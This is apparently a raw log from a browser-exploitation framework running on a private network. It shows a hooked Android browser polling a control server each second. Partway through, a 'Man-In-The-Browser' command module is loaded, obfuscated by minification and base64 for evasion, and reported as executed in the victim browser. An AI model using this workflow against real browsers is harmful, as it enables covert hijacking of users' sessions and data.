    [23:18:37][>] {"lastseen":"1692573517","count":28,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:38][>] {"lastseen":"1692573518","count":29,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:39][>] {"lastseen":"1692573519","count":30,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:40][>] {"lastseen":"1692573520","count":31,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:41][>] {"lastseen":"1692573521","count":32,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:42][>] {"lastseen":"1692573522","count":33,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:43][>] {"lastseen":"1692573523","count":34,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:44][>] {"lastseen":"1692573524","count":35,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:45][>] {"lastseen":"1692573525","count":36,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:46][>] {"lastseen":"1692573526","count":37,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:47][>] {"lastseen":"1692573527","count":38,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:48][>] {"lastseen":"1692573528","count":39,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:49][>] {"lastseen":"1692573529","count":40,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:49][>] Server: mounted handler '/command/man_in_the_browser.js'
    [23:18:49][>] Hard Load module: 'man_in_the_browser'
    [23:18:50][>] {"lastseen":"1692573530","count":41,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:51][>] {"lastseen":"1692573531","count":42,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /*","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}

[23:18:56][>] [Evasion] Applying technique: minify
[23:18:56][>] [OBFUSCATION - Minifier] JavaScript has been minified
[23:18:56][>] [Evasion] Applying technique: base_64
[23:18:56][>] [OBFUSCATION - Base64] Javascript has been base64 encoded
[23:18:56][>] [Evasion] Obfuscation completed (498 bytes)
[23:18:56][>] {"lastseen":"1692573536","count":43,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:56][>] {"lastseen":"1692573536","count":44,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:56][>] {"lastseen":"1692573536","count":45,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:56][>] {"lastseen":"1692573536","count":46,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:56][>] {"lastseen":"1692573536","count":47,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:57][>] Event: Hooked browser [id:2, ip:192.168.1.9] has executed instructions (status: UNKNOWN) from command module [cid:1, mod: 43, name:'Man-In-The-Browser']
[23:18:57][] Hooked browser [id:2, ip:192.168.1.9] has executed instructions (status: UNKNOWN) from command module [cid:1, mod: 43, name:'Man-In-The-Browser']
[23:18:57][>] Event: Hooked browser [id:2, ip:192.168.1.9] has executed instructions (status: UNKNOWN) from command module [cid:1, mod: 43, name:'Man-In-The-Browser']
[23:18:57][
] Hooked browser [id:2, ip:192.168.1.9] has executed instructions (status: UNKNOWN) from command module [cid:1, mod: 43, name:'Man-In-The-Browser']
[23:18:58][>] {"lastseen":"1692573538","count":48,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:59][>] {"lastseen":"1692573539","count":49,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:00][>] {"lastseen":"1692573540","count":50,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:01][>] {"lastseen":"1692573541","count":51,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:02][>] {"lastseen":"1692573542","count":52,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:03][>] {"lastseen":"1692573543","count":53,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:04][>] {"lastseen":"1692573544","count":54,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:05][>] {"lastseen":"1692573545","count":55,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:06][>] {"lastseen":"1692573546","count":56,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:07][>] {"lastseen":"1692573547","count":57,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:08][>] {"lastseen":"1692573548","count":58,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:09][>] {"lastseen":"1692573549","count":59,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:10][>] {"lastseen":"1692573550","count":60,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:12][>] {"lastseen":"1692573551","count":61,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:12][>] {"lastseen":"1692573552","count":62,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:13][>] {"lastseen":"1692573553","count":63,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
